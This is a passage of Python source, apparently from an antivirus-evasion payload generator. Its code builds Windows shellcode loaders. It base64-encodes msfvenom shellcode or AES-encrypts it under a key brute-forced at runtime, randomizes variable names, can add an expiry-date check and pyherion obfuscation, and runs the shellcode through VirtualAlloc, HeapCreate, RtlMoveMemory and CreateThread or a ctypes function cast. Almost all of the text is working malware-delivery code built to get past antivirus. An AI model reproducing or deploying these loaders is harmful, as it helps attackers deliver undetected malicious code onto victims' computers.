                # running at 00:00 local time on the expiry day (not at the generation time).
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                # Same VirtualAlloc/RtlMoveMemory/CreateThread sequence as the unconditional
                # branch above, indented one tab under the date check.
                PayloadCode += '\t' + RandT + " = \"" + EncodedShellcode + "\"\n"
                PayloadCode += '\t' + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
                PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
                PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName  + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += '\t' + 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
                PayloadCode += '\t' + 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode
        # Reached only when inject_method is not "virtual": every "virtual" leaf returns above.
        if self.required_options["inject_method"][0].lower() == "heap":
            if self.required_options["expire_payload"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Base64 Encode Shellcode
                EncodedShellcode = base64.b64encode(Shellcode)

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandT = helpers.randomString()
                HeapVar = helpers.randomString()

                PayloadCode = 'import ctypes\n'
                PayloadCode += 'import base64\n'
                PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
                PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
                # 0x00040000 = HEAP_CREATE_ENABLE_EXECUTE: a private executable heap sized to
                # twice the blob, then HeapAlloc with 0x8 (HEAP_ZERO_MEMORY). An executable
                # heap is itself a strong memory-forensics indicator.
                PayloadCode += HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n'
                PayloadCode += RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName  + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
                PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:

                # Get our current date and add number of days to the date
                # (same YYYY-MM-DD -> YY-MM-DD slicing as the "virtual" expiring branch).
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Base64 Encode Shellcode
                EncodedShellcode = base64.b64encode(Shellcode)

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandT = helpers.randomString()
                HeapVar = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                PayloadCode = 'import ctypes\n'
                PayloadCode +=  'import base64\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' = datetime.now()\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                # Heap variant of the sequence, one tab under the date check.
                PayloadCode += '\t' + RandT + " = \"" + EncodedShellcode + "\"\n"
                PayloadCode += '\t' + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
                PayloadCode += '\t' + HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n'
                PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName  + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
                PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

        # Any other inject_method value: no Win32 allocation calls; the stub casts a
        # ctypes string buffer to a function pointer and calls it.
        else:
            if self.required_options["expire_payload"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandShellcode = helpers.randomString()
                # RandReverseShell is generated but never referenced in the emitted stub.
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()
                DecodedShellcode = helpers.randomString()

                # Base64 Encode Shellcode
                EncodedShellcode = base64.b64encode(Shellcode)

                PayloadCode = 'from ctypes import *\n'
                PayloadCode += 'import base64\n'
                PayloadCode += ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n"
                PayloadCode += DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n"
                PayloadCode += RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n'
                PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                # Unlike the other branches, the last emitted line carries no trailing newline.
                PayloadCode += RandShellcode + '()'
    
                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:

                # Get our current date and add number of days to the date
                # (same YYYY-MM-DD -> YY-MM-DD slicing as the other expiring branches).
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandShellcode = helpers.randomString()
                # RandReverseShell is generated but never referenced in the emitted stub.
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()
                DecodedShellcode = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # Base64 Encode Shellcode
                EncodedShellcode = base64.b64encode(Shellcode)

                PayloadCode = 'from ctypes import *\n'
                PayloadCode += 'import base64\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' = datetime.now()\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n"
                PayloadCode += '\t' + DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n"
                PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n'
                PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                # No trailing newline on the final emitted line (matches the branch above).
                PayloadCode += '\t' + RandShellcode + '()'

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode
    def generate(self):
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandDecodeAES = helpers.randomString()
                RandCipherObject = helpers.randomString()
                RandDecodedShellcode = helpers.randomString()
                RandShellCode = helpers.randomString()
                RandPadding = helpers.randomString()
                known_plaintext_string = helpers.randomString()
                plaintext_string_variable = helpers.randomString()
                key_guess = helpers.randomString()
                secret_key = helpers.randomString()
                small_constrained_key_variable = helpers.randomString()
        
                # encrypt the shellcode and grab the randomized key
                (EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode)

                # Use the secret we received earlier to encrypt our known plaintext string
                encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string)
        
                # Create Payload code
                PayloadCode = 'import ctypes\n'
                PayloadCode += 'from Crypto.Cipher import AES\n'
                PayloadCode += 'import base64\n'
                PayloadCode += 'import os\n'
                PayloadCode += small_constrained_key_variable + ' = \'' + partial_key + '\'\n'
                PayloadCode += RandPadding + ' = \'{\'\n'
                PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
                PayloadCode += 'for ' + key_guess + ' in range(100000, 1000000):\n'
                PayloadCode += '\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n'
                PayloadCode += '\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n'
                PayloadCode += '\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n'
                PayloadCode += '\tif ' + plaintext_string_variable + ' == \'' + known_plaintext_string + '\':\n'
                PayloadCode += '\t\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
                PayloadCode += '\t\t' + RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
                PayloadCode += '\t\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
                PayloadCode += '\t\t' + RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
                PayloadCode += '\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
                PayloadCode += '\t\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
                PayloadCode += '\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
        
                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:

                # Get our current date and add number of days to the date
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()
        
                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandDecodeAES = helpers.randomString()
                RandCipherObject = helpers.randomString()
                RandDecodedShellcode = helpers.randomString()
                RandShellCode = helpers.randomString()
                RandPadding = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()
                known_plaintext_string = helpers.randomString()
                plaintext_string_variable = helpers.randomString()
                key_guess = helpers.randomString()
                secret_key = helpers.randomString()
                small_constrained_key_variable = helpers.randomString()
        
                # encrypt the shellcode and grab the randomized key
                (EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode)

                # Use the secret we received earlier to encrypt our known plaintext string
                encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string)
        
                # Create Payload code
                PayloadCode = 'import ctypes\n'
                PayloadCode += 'from Crypto.Cipher import AES\n'
                PayloadCode += 'import base64\n'
                PayloadCode += 'import os\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' = datetime.now()\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + small_constrained_key_variable + ' = \'' + partial_key + '\'\n'
                PayloadCode += '\t' + RandPadding + ' = \'{\'\n'
                PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
                PayloadCode += '\tfor ' + key_guess + ' in range(100000, 1000000):\n'
                PayloadCode += '\t\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n'
                PayloadCode += '\t\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n'
                PayloadCode += '\t\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n'
                PayloadCode += '\t\tif ' + plaintext_string_variable + ' == \'' + known_plaintext_string + '\':\n'
                PayloadCode += '\t\t\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
                PayloadCode += '\t\t\t' + RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
                PayloadCode += '\t\t\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
                PayloadCode += '\t\t\t' + RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
                PayloadCode += '\t\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
                PayloadCode += '\t\t\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
                PayloadCode += '\t\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
        
                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

        if self.required_options["INJECT_METHOD"][0].lower() == "heap":
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
                
                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()
        
                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandDecodeAES = helpers.randomString()
                RandCipherObject = helpers.randomString()
                RandDecodedShellcode = helpers.randomString()
                RandShellCode = helpers.randomString()
                RandPadding = helpers.randomString()
                known_plaintext_string = helpers.randomString()
                plaintext_string_variable = helpers.randomString()
                key_guess = helpers.randomString()
                secret_key = helpers.randomString()
                small_constrained_key_variable = helpers.randomString()
                HeapVar = helpers.randomString()
        
                # encrypt the shellcode and grab the randomized key
                (EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode)

                # Use the secret we received earlier to encrypt our known plaintext string
                encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string)
        
                # Create Payload code
                PayloadCode = 'import ctypes\n'
                PayloadCode += 'from Crypto.Cipher import AES\n'
                PayloadCode += 'import base64\n'
                PayloadCode += 'import os\n'
                PayloadCode += small_constrained_key_variable + ' = \'' + partial_key + '\'\n'
                PayloadCode += RandPadding + ' = \'{\'\n'
                PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
                PayloadCode += 'for ' + key_guess + ' in range(100000, 1000000):\n'
                PayloadCode += '\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n'
                PayloadCode += '\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n'
                PayloadCode += '\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n'
                PayloadCode += '\tif ' + plaintext_string_variable + ' == \'' + known_plaintext_string + '\':\n'
                PayloadCode += '\t\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
                PayloadCode += '\t\t' + RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
                PayloadCode += '\t\t' + HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + RandShellCode + ') * 2),ctypes.c_int(0))\n'
                PayloadCode += '\t\t' + RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + RandShellCode + ')))\n'
                PayloadCode += '\t\t' + RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
                PayloadCode += '\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
                PayloadCode += '\t\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
                PayloadCode += '\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
        
                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:

                # Get our current date and add number of days to the date
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()
        
                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandDecodeAES = helpers.randomString()
                RandCipherObject = helpers.randomString()
                RandDecodedShellcode = helpers.randomString()
                RandShellCode = helpers.randomString()
                RandPadding = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()
                known_plaintext_string = helpers.randomString()
                plaintext_string_variable = helpers.randomString()
                key_guess = helpers.randomString()
                secret_key = helpers.randomString()
                small_constrained_key_variable = helpers.randomString()
                HeapVar = helpers.randomString()
        
                # encrypt the shellcode and grab the randomized key
                (EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode)

                # Use the secret we received earlier to encrypt our known plaintext string
                encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string)
        
                # Create Payload code
                PayloadCode = 'import ctypes\n'
                PayloadCode += 'from Crypto.Cipher import AES\n'
                PayloadCode += 'import base64\n'
                PayloadCode += 'import os\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' = datetime.now()\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + small_constrained_key_variable + ' = \'' + partial_key + '\'\n'
                PayloadCode += '\t' + RandPadding + ' = \'{\'\n'
                PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
                PayloadCode += '\tfor ' + key_guess + ' in range(100000, 1000000):\n'
                PayloadCode += '\t\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n'
                PayloadCode += '\t\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n'
                PayloadCode += '\t\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n'
                PayloadCode += '\t\tif ' + plaintext_string_variable + ' == \'' + known_plaintext_string + '\':\n'
                PayloadCode += '\t\t\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
                PayloadCode += '\t\t\t' + RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
                PayloadCode += '\t\t\t' + HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + RandShellCode + ') * 2),ctypes.c_int(0))\n'
                PayloadCode += '\t\t\t' + RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + RandShellCode + ')))\n'
                PayloadCode += '\t\t\t' + RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
                PayloadCode += '\t\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
                PayloadCode += '\t\t\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
                PayloadCode += '\t\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
        
                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode


        else:
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()
        
                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandDecodeAES = helpers.randomString()
                RandCipherObject = helpers.randomString()
                RandDecodedShellcode = helpers.randomString()
                RandShellCode = helpers.randomString()
                RandPadding = helpers.randomString()
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()
                known_plaintext_string = helpers.randomString()
                plaintext_string_variable = helpers.randomString()
                key_guess = helpers.randomString()
                secret_key = helpers.randomString()
                small_constrained_key_variable = helpers.randomString()
        
                # encrypt the shellcode and grab the randomized key
                (EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode)

                # Use the secret we received earlier to encrypt our known plaintext string
                encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string)

                # Create Payload code
                PayloadCode = 'from ctypes import *\n'
                PayloadCode += 'from Crypto.Cipher import AES\n'
                PayloadCode += 'import base64\n'
                PayloadCode += 'import os\n'
                PayloadCode += small_constrained_key_variable + ' = \'' + partial_key + '\'\n'
                PayloadCode += RandPadding + ' = \'{\'\n'
                PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
                PayloadCode += 'for ' + key_guess + ' in range(100000, 1000000):\n'
                PayloadCode += '\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n'
                PayloadCode += '\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n'
                PayloadCode += '\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n'
                PayloadCode += '\tif ' + plaintext_string_variable + ' == \'' + known_plaintext_string + '\':\n'
                PayloadCode += '\t\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
                PayloadCode += '\t\t' + ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n'
                PayloadCode += '\t\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
                PayloadCode += '\t\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                PayloadCode += '\t\t' + RandShellcode + '()'
    
                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:
                # Get our current date and add number of days to the date
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()
        
                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandDecodeAES = helpers.randomString()
                RandCipherObject = helpers.randomString()
                RandDecodedShellcode = helpers.randomString()
                RandShellCode = helpers.randomString()
                RandPadding = helpers.randomString()
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()
                known_plaintext_string = helpers.randomString()
                plaintext_string_variable = helpers.randomString()
                key_guess = helpers.randomString()
                secret_key = helpers.randomString()
                small_constrained_key_variable = helpers.randomString()
        
                # encrypt the shellcode and grab the randomized key
                (EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode)

                # Use the secret we received earlier to encrypt our known plaintext string
                encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string)

                # Create Payload code
                PayloadCode = 'from ctypes import *\n'
                PayloadCode += 'from Crypto.Cipher import AES\n'
                PayloadCode += 'import base64\n'
                PayloadCode += 'import os\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' = datetime.now()\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + small_constrained_key_variable + ' = \'' + partial_key + '\'\n'
                PayloadCode += '\t' + RandPadding + ' = \'{\'\n'
                PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
                PayloadCode += '\tfor ' + key_guess + ' in range(100000, 1000000):\n'
                PayloadCode += '\t\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n'
                PayloadCode += '\t\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n'
                PayloadCode += '\t\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n'
                PayloadCode += '\t\tif ' + plaintext_string_variable + ' == \'' + known_plaintext_string + '\':\n'
                PayloadCode += '\t\t\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
                PayloadCode += '\t\t\t' + ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n'
                PayloadCode += '\t\t\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
                PayloadCode += '\t\t\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                PayloadCode += '\t\t\t' + RandShellcode + '()'
    
                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode
